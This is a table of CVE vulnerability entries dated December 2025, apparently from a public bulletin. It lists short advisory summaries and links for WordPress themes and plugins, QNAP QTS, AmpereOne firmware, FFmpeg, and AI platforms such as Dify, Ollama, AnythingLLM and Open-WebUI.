| axiomthemes--Pinevale | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Pinevale pinevale allows PHP Local File Inclusion.This issue affects Pinevale: from n/a through <= 1.0.14. | 2025-12-18 | not yet calculated | CVE-2025-60065 | https://vdp.patchstack.com/database/Wordpress/Theme/pinevale/vulnerability/wordpress-pinevale-theme-1-0-14-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Katelyn | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Katelyn katelyn allows PHP Local File Inclusion.This issue affects Katelyn: from n/a through <= 1.0.10. | 2025-12-18 | not yet calculated | CVE-2025-60066 | https://vdp.patchstack.com/database/Wordpress/Theme/katelyn/vulnerability/wordpress-katelyn-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Giardino | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Giardino giardino allows PHP Local File Inclusion.This issue affects Giardino: from n/a through <= 1.1.10. | 2025-12-18 | not yet calculated | CVE-2025-60067 | https://vdp.patchstack.com/database/Wordpress/Theme/giardino/vulnerability/wordpress-giardino-theme-1-1-10-local-file-inclusion-vulnerability?_s_id=cve |
| javothemes--Javo Core | Improper Control of Generation of Code ('Code Injection') vulnerability in javothemes Javo Core javo-core allows Code Injection.This issue affects Javo Core: from n/a through <= 3.0.0.266. | 2025-12-18 | not yet calculated | CVE-2025-60068 | https://vdp.patchstack.com/database/Wordpress/Plugin/javo-core/vulnerability/wordpress-javo-core-plugin-3-0-0-266-arbitrary-code-execution-vulnerability?_s_id=cve |
| ThemeMove--MinimogWP | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove MinimogWP minimog allows PHP Local File Inclusion.This issue affects MinimogWP: from n/a through <= 3.9.6. | 2025-12-18 | not yet calculated | CVE-2025-60069 | https://vdp.patchstack.com/database/Wordpress/Theme/minimog/vulnerability/wordpress-minimogwp-theme-3-9-2-local-file-inclusion-vulnerability?_s_id=cve |
| The4--Molla | Improper Control of Generation of Code ('Code Injection') vulnerability in The4 Molla molla allows Code Injection.This issue affects Molla: from n/a through <= 1.5.13. | 2025-12-18 | not yet calculated | CVE-2025-60070 | https://vdp.patchstack.com/database/Wordpress/Theme/molla/vulnerability/wordpress-molla-multipurpose-responsive-shopify-theme-1-5-13-arbitrary-code-execution-vulnerability?_s_id=cve |
| don-themes--Riode | Multi-Purpose WooCommerce | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in don-themes Riode | Multi-Purpose WooCommerce riode allows PHP Local File Inclusion.This issue affects Riode | Multi-Purpose WooCommerce: from n/a through <= 1.6.23. | 2025-12-18 | not yet calculated | CVE-2025-60071 | https://vdp.patchstack.com/database/Wordpress/Theme/riode/vulnerability/wordpress-riode-multi-purpose-woocommerce-theme-1-6-23-local-file-inclusion-vulnerability?_s_id=cve |
| Processby--Anchor smooth scroll | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Processby Anchor smooth scroll anchor-smooth-scroll allows PHP Local File Inclusion.This issue affects Anchor smooth scroll: from n/a through <= 1.0.2. | 2025-12-18 | not yet calculated | CVE-2025-60072 | https://vdp.patchstack.com/database/Wordpress/Plugin/anchor-smooth-scroll/vulnerability/wordpress-anchor-smooth-scroll-plugin-1-0-2-local-file-inclusion-vulnerability?_s_id=cve |
| jbhovik--Ray Enterprise Translation | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jbhovik Ray Enterprise Translation lingotek-translation allows PHP Local File Inclusion.This issue affects Ray Enterprise Translation: from n/a through <= 1.7.1. | 2025-12-18 | not yet calculated | CVE-2025-60076 | https://vdp.patchstack.com/database/Wordpress/Plugin/lingotek-translation/vulnerability/wordpress-ray-enterprise-translation-plugin-1-7-1-local-file-inclusion-vulnerability?_s_id=cve |
| YayCommerce--YayPricing | Missing Authorization vulnerability in YayCommerce YayPricing yaypricing allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects YayPricing: from n/a through <= 3.5.3. | 2025-12-18 | not yet calculated | CVE-2025-60077 | https://vdp.patchstack.com/database/Wordpress/Plugin/yaypricing/vulnerability/wordpress-yaypricing-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve |
| Agence web Eoxia - Montpellier--Task Manager | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Agence web Eoxia - Montpellier Task Manager task-manager allows PHP Local File Inclusion.This issue affects Task Manager: from n/a through <= 3.0.2. | 2025-12-18 | not yet calculated | CVE-2025-60078 | https://vdp.patchstack.com/database/Wordpress/Plugin/task-manager/vulnerability/wordpress-task-manager-plugin-3-0-2-local-file-inclusion-vulnerability?_s_id=cve |
| bPlugins--Parallax Section block | Missing Authorization vulnerability in bPlugins Parallax Section block parallax-section allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Parallax Section block: from n/a through <= 1.0.9. | 2025-12-18 | not yet calculated | CVE-2025-60079 | https://vdp.patchstack.com/database/Wordpress/Plugin/parallax-section/vulnerability/wordpress-parallax-section-block-plugin-1-0-9-broken-authentication-vulnerability?_s_id=cve |
| add-ons.org--PDF for Gravity Forms + Drag And Drop Template Builder | Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Gravity Forms + Drag And Drop Template Builder pdf-for-gravity-forms allows Object Injection.This issue affects PDF for Gravity Forms + Drag And Drop Template Builder: from n/a through <= 6.3.0. | 2025-12-18 | not yet calculated | CVE-2025-60080 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-gravity-forms/vulnerability/wordpress-pdf-for-gravity-forms-drag-and-drop-template-builder-plugin-6-3-0-php-object-injection-vulnerability?_s_id=cve |
| add-ons.org--PDF for Contact Form 7 | Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Contact Form 7 pdf-for-contact-form-7 allows Object Injection.This issue affects PDF for Contact Form 7: from n/a through <= 6.3.4. | 2025-12-18 | not yet calculated | CVE-2025-60081 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-contact-form-7/vulnerability/wordpress-pdf-for-contact-form-7-plugin-6-3-0-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| add-ons.org--PDF for WPForms | Deserialization of Untrusted Data vulnerability in add-ons.org PDF for WPForms pdf-for-wpforms allows Object Injection.This issue affects PDF for WPForms: from n/a through <= 6.3.1. | 2025-12-18 | not yet calculated | CVE-2025-60082 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-wpforms/vulnerability/wordpress-pdf-for-wpforms-plugin-6-3-0-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| add-ons.org--PDF Invoice Builder for WooCommerce | Deserialization of Untrusted Data vulnerability in add-ons.org PDF Invoice Builder for WooCommerce pdf-for-woocommerce allows Object Injection.This issue affects PDF Invoice Builder for WooCommerce: from n/a through <= 6.3.2. | 2025-12-18 | not yet calculated | CVE-2025-60083 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-woocommerce/vulnerability/wordpress-pdf-invoice-builder-for-woocommerce-plugin-6-3-2-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| add-ons.org--PDF for Elementor Forms + Drag And Drop Template Builder | Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Elementor Forms + Drag And Drop Template Builder pdf-for-elementor-forms allows Object Injection.This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through <= 6.3.1. | 2025-12-18 | not yet calculated | CVE-2025-60084 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-6-3-1-php-object-injection-vulnerability?_s_id=cve |
| Matt--WP Voting Contest | Missing Authorization vulnerability in Matt WP Voting Contest wp-voting-contest allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Voting Contest: from n/a through <= 5.8. | 2025-12-18 | not yet calculated | CVE-2025-60086 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-voting-contest/vulnerability/wordpress-wp-voting-contest-plugin-5-8-broken-access-control-vulnerability?_s_id=cve |
| Saleswonder Team: Tobias--WebinarIgnition | Missing Authorization vulnerability in Saleswonder Team: Tobias WebinarIgnition webinar-ignition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WebinarIgnition: from n/a through <= 4.06.04. | 2025-12-18 | not yet calculated | CVE-2025-60088 | https://vdp.patchstack.com/database/Wordpress/Plugin/webinar-ignition/vulnerability/wordpress-webinarignition-plugin-4-05-13-broken-access-control-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms FreshDesk Plugin | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms FreshDesk Plugin gf-freshdesk allows Object Injection.This issue affects WP Gravity Forms FreshDesk Plugin: from n/a through <= 1.3.5. | 2025-12-18 | not yet calculated | CVE-2025-60089 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-freshdesk/vulnerability/wordpress-wp-gravity-forms-freshdesk-plugin-plugin-1-3-5-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms Insightly | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Insightly gf-insightly allows Object Injection.This issue affects WP Gravity Forms Insightly: from n/a through <= 1.1.6. | 2025-12-18 | not yet calculated | CVE-2025-60090 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-insightly/vulnerability/wordpress-wp-gravity-forms-insightly-plugin-1-1-5-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms Zoho CRM and Bigin | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Zoho CRM and Bigin gf-zoho allows Object Injection.This issue affects WP Gravity Forms Zoho CRM and Bigin: from n/a through <= 1.2.9. | 2025-12-18 | not yet calculated | CVE-2025-60091 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-zoho/vulnerability/wordpress-wp-gravity-forms-zoho-crm-and-bigin-plugin-1-2-8-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms Constant Contact Plugin | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Constant Contact Plugin gf-constant-contact allows Object Injection.This issue affects WP Gravity Forms Constant Contact Plugin: from n/a through <= 1.1.2. | 2025-12-18 | not yet calculated | CVE-2025-60174 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-constant-contact/vulnerability/wordpress-wp-gravity-forms-constant-contact-plugin-plugin-1-1-2-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms HubSpot | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms HubSpot gf-hubspot allows Object Injection.This issue affects WP Gravity Forms HubSpot: from n/a through <= 1.2.6. | 2025-12-18 | not yet calculated | CVE-2025-60178 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-hubspot/vulnerability/wordpress-wp-gravity-forms-hubspot-plugin-1-2-6-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms Salesforce | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Salesforce gf-salesforce-crmperks allows Object Injection.This issue affects WP Gravity Forms Salesforce: from n/a through <= 1.5.1. | 2025-12-18 | not yet calculated | CVE-2025-60180 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-salesforce-crmperks/vulnerability/wordpress-wp-gravity-forms-salesforce-plugin-1-5-1-php-object-injection-vulnerability?_s_id=cve |
| Schiocco--Support Board | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Schiocco Support Board supportboard allows Reflected XSS.This issue affects Support Board: from n/a through < 3.8.7. | 2025-12-18 | not yet calculated | CVE-2025-60182 | https://vdp.patchstack.com/database/Wordpress/Plugin/supportboard/vulnerability/wordpress-support-board-plugin-3-8-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| iceScrum--iceSrum | A Zip Slip vulnerability in the import a Project component of iceScrum v7.54 Pro On-prem allows attackers to execute arbitrary code via uploading a crafted Zip file. | 2025-12-15 | not yet calculated | CVE-2025-60786 | https://www.icescrum.com/download/ https://zdaylabs.com/CVE-2025-60786.html |
| Johnson Controls--iSTAReX, iSTAR Edge, iSTAR Ultra LT, iSTAR Ultra , iSTAR Ultra SE | Successful exploitation of this vulnerability could result in the product failing to re-establish communication once the certificate expires. | 2025-12-17 | not yet calculated | CVE-2025-61736 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-04 |
| Inaba Denki Sangyo Co., Ltd.--CHOCO TEI WATCHER mini (IB-MCT001) | CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper check for unusual or exceptional conditions. If a remote attacker sends a specially crafted request to the Video Download interface, the system may become unresponsive. | 2025-12-16 | not yet calculated | CVE-2025-61976 | https://www.inaba.co.jp/files/chocomini_vulnerability_newly_identified.pdf https://jvn.jp/en/vu/JVNVU92827367/ |
| QNAP Systems Inc.--QTS | An improper neutralization of argument delimiters in a command vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to alter execution logic. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later QuTS hero h5.2.7.3297 build 20251024 and later QuTS hero h5.3.1.3292 build 20251024 and later | 2025-12-16 | not yet calculated | CVE-2025-62847 | https://www.qnap.com/en/security-advisory/qsa-25-45 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later QuTS hero h5.2.7.3297 build 20251024 and later QuTS hero h5.3.1.3292 build 20251024 and later | 2025-12-16 | not yet calculated | CVE-2025-62848 | https://www.qnap.com/en/security-advisory/qsa-25-45 |
| QNAP Systems Inc.--QTS | An SQL injection vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later QuTS hero h5.2.7.3297 build 20251024 and later QuTS hero h5.3.1.3292 build 20251024 and later | 2025-12-16 | not yet calculated | CVE-2025-62849 | https://www.qnap.com/en/security-advisory/qsa-25-45 |
| Ampere--AmpereOne | Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM Boot Error Record Table driver that could result in (1) an out-of-bounds read which leaks Secure-EL0 information to a process running in Non-Secure state or (2) an out-of-bounds write which corrupts Secure or Non-Secure memory, limited to memory mapped to UEFI-MM Secure Partition by the Secure Partition Manager. | 2025-12-16 | not yet calculated | CVE-2025-62862 | https://amperecomputing.com/products/product-security https://amperecomputing.com/products/security-bulletins/amp-sb-0007 |
| Ampere--AmpereOne | Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM PCIe driver that could result in an out-of-bounds write within PCIe driver's S-EL0 address space. | 2025-12-16 | not yet calculated | CVE-2025-62863 | https://amperecomputing.com/products/product-security https://amperecomputing.com/products/security-bulletins/amp-sb-0007 |
| Ampere--AmpereOne | Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM MMCommunicate service that could result in an out-of-bounds write within the UEFI-MM Secure Partition context. | 2025-12-16 | not yet calculated | CVE-2025-62864 | https://amperecomputing.com/products/product-security https://amperecomputing.com/products/security-bulletins/amp-sb-0007 |
| CridioStudio--ListingPro | Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingPro: from n/a through <= 2.9.9. | 2025-12-18 | not yet calculated | CVE-2025-63039 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-9-broken-access-control-vulnerability-2?_s_id=cve |
| MatrixAddons--Easy Invoice | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MatrixAddons Easy Invoice easy-invoice allows DOM-Based XSS.This issue affects Easy Invoice: from n/a through <= 2.0.9. | 2025-12-18 | not yet calculated | CVE-2025-6324 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-invoice/vulnerability/wordpress-easy-invoice-plugin-2-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AncoraThemes--Inset | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Inset inset allows PHP Local File Inclusion.This issue affects Inset: from n/a through <= 1.18.0. | 2025-12-18 | not yet calculated | CVE-2025-6326 | https://vdp.patchstack.com/database/Wordpress/Theme/inset/vulnerability/wordpress-inset-1-18-0-local-file-inclusion-vulnerability?_s_id=cve |
| Dify--Dify | A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/setup endpoint. The endpoint implements an insecure CORS policy that reflects any Origin header and enables Access-Control-Allow-Credentials: true, permitting arbitrary external domains to make authenticated requests. | 2025-12-18 | not yet calculated | CVE-2025-63386 | https://github.com/langgenius/dify/discussions https://gist.github.com/Cristliu/1610daac87c711ac3e0250c58f5cc4f9 |
| Dify--Dify | Dify v1.9.1 is vulnerable to Insecure Permissions. An unauthenticated attacker can directly send HTTP GET requests to the /console/api/system-features endpoint without any authentication credentials or session tokens. The endpoint fails to implement proper authorization checks, allowing anonymous access to sensitive system configuration data. | 2025-12-18 | not yet calculated | CVE-2025-63387 | https://github.com/langgenius/dify/discussions https://gist.github.com/Cristliu/cddc0cbbf354de51106ab63a11be94af |
| Dify--Dify | A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/system-features endpoint. The endpoint implements an overly permissive CORS policy that reflects arbitrary Origin headers and sets Access-Control-Allow-Credentials: true, allowing any external domain to make authenticated cross-origin requests. | 2025-12-18 | not yet calculated | CVE-2025-63388 | https://github.com/langgenius/dify/discussions https://gist.github.com/Cristliu/5ded6d03e41d7d66ecb1b568bae3ff6c |
| Ollama-Ollama | A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations. | 2025-12-18 | not yet calculated | CVE-2025-63389 | https://github.com/ollama/ollama/issues https://gist.github.com/Cristliu/48dae561696374744d9fced07a544ecd |
| AynthingLLM--AnythingLLM | An authentication bypass vulnerability exists in AnythingLLM v1.8.5 in via the /api/workspaces endpoint. The endpoint fails to implement proper authentication checks, allowing unauthenticated remote attackers to enumerate and retrieve detailed information about all configured workspaces. Exposed data includes: workspace identifiers (id, name, slug), AI model configurations (chatProvider, chatModel, agentProvider), system prompts (openAiPrompt), operational parameters (temperature, history length, similarity thresholds), vector search settings, chat modes, and timestamps. | 2025-12-18 | not yet calculated | CVE-2025-63390 | https://github.com/Mintplex-Labs/anything-llm/issues https://gist.github.com/Cristliu/ba529c99abec87102e5ef36435d02a6d |
| Open-WebUI--Open-WebUI | An authentication bypass vulnerability exists in Open-WebUI <=0.6.32 in the /api/config endpoint. The endpoint lacks proper authentication and authorization controls, exposing sensitive system configuration data to unauthenticated remote attackers. | 2025-12-18 | not yet calculated | CVE-2025-63391 | https://github.com/open-webui/open-webui/issues https://gist.github.com/Cristliu/13c41b97285b776275bc8bfd3504e51b |
| Allsky WebUI--Allsky WebUI | A Path Traversal vulnerability in the Allsky WebUI version v2024.12.06_06 allows an unauthenticated remote attacker to achieve arbitrary command execution. By sending a crafted HTTP request to the /html/execute.php endpoint with a malicious payload in the id parameter, an attacker can execute arbitrary commands on the underlying operating system, leading to full remote code execution (RCE). | 2025-12-16 | not yet calculated | CVE-2025-63414 | https://github.com/AllskyTeam/allsky https://github.com/AllskyTeam/allsky/blob/master/html/execute.php https://gh0stmezh.wordpress.com/2025/12/02/cve-2025-63414/ |
| GT Edge--GT Edge | An issue in GT Edge AI Platform Versions before v2.0.10-dev allows attackers to execute arbitrary code via injecting a crafted JSON payload into the Prompt window. | 2025-12-19 | not yet calculated | CVE-2025-63665 | https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending https://gist.github.com/p80n-sec/e5eefcef155e9dd14aaaaa49f9f94cd1 |
| yuv2ya16_X_c_--yuv2ya16_X_c_ | Integer overflow vulnerability in the yuv2ya16_X_c_template function in libswscale/output.c in FFmpeg 8.0. | 2025-12-18 | not yet calculated | CVE-2025-63757 | https://code.ffmpeg.org/FFmpeg/FFmpeg/pulls/20698 https://gist.github.com/miora-sora/43c1c5616dd5b4f960a9d20296ef4833 https://ffmpeg.org/security.html |
| phpMsAdmin--phpMsAdmin | A Reflected Cross-Site Scripting (XSS) vulnerability exists in phpMsAdmin version 2.2 in the database_mode.php file. An attacker can execute arbitrary web script or HTML via the dbname parameter after a user is authenticated. | 2025-12-18 | not yet calculated | CVE-2025-63947 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/phpMsAdmin/CVE-pending-phpMsAdmin.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/phpMsAdmin/CVE-2025-63947.md |
| phpMsAdmin--phpMsAdmin | A SQL Injection vulnerability exists in phpMsAdmin version 2.2 in the database_mode.php file. An attacker can execute arbitrary SQL commands via the dbname parameter, potentially leading to information disclosure or database manipulation. | 2025-12-18 | not yet calculated | CVE-2025-63948 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/phpMsAdmin/CVE-pending-phpMsAdmin.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/phpMsAdmin/CVE-2025-63948.md |
| yohanawi--yohanawi | A Reflected Cross-Site Scripting (XSS) vulnerability in yohanawi Hotel Management System (commit 87e004a) allows a remote attacker to execute arbitrary web script via the 'error' parameter in pages/room.php. | 2025-12-18 | not yet calculated | CVE-2025-63949 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/Hotel-Management-System/CVE-pending-XSS.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/Hotel-Management-System/CVE-2025-63949.md |
| to3k--Twittodon | An insecure deserialization vulnerability exists in the download.php script of the to3k Twittodon application through commit b1c58a7d1dc664b38deb486ca290779621342c0b (2023-02-28). The 'obj' parameter receives base64-encoded data that is passed directly to the unserialize() function without validation. This allows a remote, unauthenticated attacker to inject arbitrary PHP objects, leading to a denial of service. | 2025-12-18 | not yet calculated | CVE-2025-63950 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/Twittodon/CVE-pending-Deserialization.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/Twittodon/CVE-2025-63950.md |
| MiczFlor--RPi-Jukebox-RFID | An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukebox-RFID project through commit 4b2334f0ae0e87c0568876fc41c48c38aa9a7014 (2025-10-07). The 'rss' GET parameter receives data that is passed directly to the unserialize() function without validation. This allows a remote, unauthenticated attacker to inject arbitrary PHP objects, causing the application to process them and leading to errors or a denial of service. | 2025-12-18 | not yet calculated | CVE-2025-63951 | https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/RPi-Jukebox-RFID/CVE-pending-Deserialization.md https://github.com/solonbarroso/vulnerability-research/blob/main/advisories/RPi-Jukebox-RFID/CVE-2025-63951.md |
| InvoicePlane --InvoicePlane | InvoicePlane commit debb446c is vulnerable to Incorrect Access Control. The invoices/view handler fails to verify ownership before returning invoice data. | 2025-12-16 | not yet calculated | CVE-2025-64012 | https://github.com/InvoicePlane/InvoicePlane/commit/debb446ceaa84efc136987fc1e21b268f34e47b0 https://gist.github.com/tarekramm/797073e9ae991211ff2ae71ed1190c7d |
| PenciDesign--Soledad | Incorrect Privilege Assignment vulnerability in PenciDesign Soledad soledad allows Privilege Escalation.This issue affects Soledad: from n/a through <= 8.6.9. | 2025-12-18 | not yet calculated | CVE-2025-64188 | https://vdp.patchstack.com/database/Wordpress/Theme/soledad/vulnerability/wordpress-soledad-theme-8-6-9-privilege-escalation-vulnerability?_s_id=cve |
| 8theme--XStore Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme XStore Core et-core-plugin allows Reflected XSS.This issue affects XStore Core: from n/a through < 5.6. | 2025-12-18 | not yet calculated | CVE-2025-64189 | https://vdp.patchstack.com/database/Wordpress/Plugin/et-core-plugin/vulnerability/wordpress-xstore-core-plugin-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| 8theme--XStore | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme XStore xstore allows Reflected XSS.This issue affects XStore: from n/a through < 9.6.1. | 2025-12-18 | not yet calculated | CVE-2025-64191 | https://vdp.patchstack.com/database/Wordpress/Theme/xstore/vulnerability/wordpress-xstore-theme-9-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| 8theme--XStore | Missing Authorization vulnerability in 8theme XStore xstore allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects XStore: from n/a through < 9.6. | 2025-12-18 | not yet calculated | CVE-2025-64192 | https://vdp.patchstack.com/database/Wordpress/Theme/xstore/vulnerability/wordpress-xstore-theme-9-6-broken-access-control-vulnerability?_s_id=cve |
| 8theme--XStore | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in 8theme XStore xstore allows PHP Local File Inclusion.This issue affects XStore: from n/a through < 9.6.1. | 2025-12-18 | not yet calculated | CVE-2025-64193 | https://vdp.patchstack.com/database/Wordpress/Theme/xstore/vulnerability/wordpress-xstore-theme-9-6-1-local-file-inclusion-vulnerability?_s_id=cve |
| EverPress--Mailster | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EverPress Mailster mailster allows Reflected XSS.This issue affects Mailster: from n/a through < 4.1.14. | 2025-12-18 | not yet calculated | CVE-2025-64203 | https://vdp.patchstack.com/database/Wordpress/Plugin/mailster/vulnerability/wordpress-mailster-plugin-4-1-14-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TieLabs--Jannah | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TieLabs Jannah jannah allows PHP Local File Inclusion.This issue affects Jannah: from n/a through <= 7.6.0. | 2025-12-18 | not yet calculated | CVE-2025-64205 | https://vdp.patchstack.com/database/Wordpress/Theme/jannah/vulnerability/wordpress-jannah-theme-7-6-0-local-file-inclusion-vulnerability?_s_id=cve |
| TieLabs--Jannah | Deserialization of Untrusted Data vulnerability in TieLabs Jannah jannah allows Object Injection.This issue affects Jannah: from n/a through <= 7.6.0. | 2025-12-18 | not yet calculated | CVE-2025-64206 | https://vdp.patchstack.com/database/Wordpress/Theme/jannah/vulnerability/wordpress-jannah-theme-7-6-0-php-object-injection-vulnerability?_s_id=cve |
| TieLabs--Jannah | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TieLabs Jannah jannah allows DOM-Based XSS.This issue affects Jannah: from n/a through <= 7.6.0. | 2025-12-18 | not yet calculated | CVE-2025-64207 | https://vdp.patchstack.com/database/Wordpress/Theme/jannah/vulnerability/wordpress-jannah-theme-7-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| StylemixThemes--Masterstudy | Missing Authorization vulnerability in StylemixThemes Masterstudy masterstudy allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Masterstudy: from n/a through < 4.8.122. | 2025-12-18 | not yet calculated | CVE-2025-64209 | https://vdp.patchstack.com/database/Wordpress/Theme/masterstudy/vulnerability/wordpress-masterstudy-theme-4-8-122-broken-access-control-vulnerability?_s_id=cve |
| StylemixThemes--MasterStudy LMS Pro | Insertion of Sensitive Information Into Sent Data vulnerability in StylemixThemes MasterStudy LMS Pro masterstudy-lms-learning-management-system-pro allows Retrieve Embedded Sensitive Data.This issue affects MasterStudy LMS Pro: from n/a through < 4.7.16. | 2025-12-18 | not yet calculated | CVE-2025-64213 | https://vdp.patchstack.com/database/Wordpress/Plugin/masterstudy-lms-learning-management-system-pro/vulnerability/wordpress-masterstudy-lms-pro-plugin-4-7-16-sensitive-data-exposure-vulnerability?_s_id=cve |
| StylemixThemes--MasterStudy LMS Pro | Missing Authorization vulnerability in StylemixThemes MasterStudy LMS Pro masterstudy-lms-learning-management-system-pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects MasterStudy LMS Pro: from n/a through < 4.7.16. | 2025-12-18 | not yet calculated | CVE-2025-64214 | https://vdp.patchstack.com/database/Wordpress/Plugin/masterstudy-lms-learning-management-system-pro/vulnerability/wordpress-masterstudy-lms-pro-plugin-4-7-16-arbitrary-content-deletion-vulnerability?_s_id=cve |
| ThemeGoods--Photography | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Photography photography allows Reflected XSS.This issue affects Photography: from n/a through <= 7.7.2. | 2025-12-18 | not yet calculated | CVE-2025-64217 | https://vdp.patchstack.com/database/Wordpress/Theme/photography/vulnerability/wordpress-photography-theme-7-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
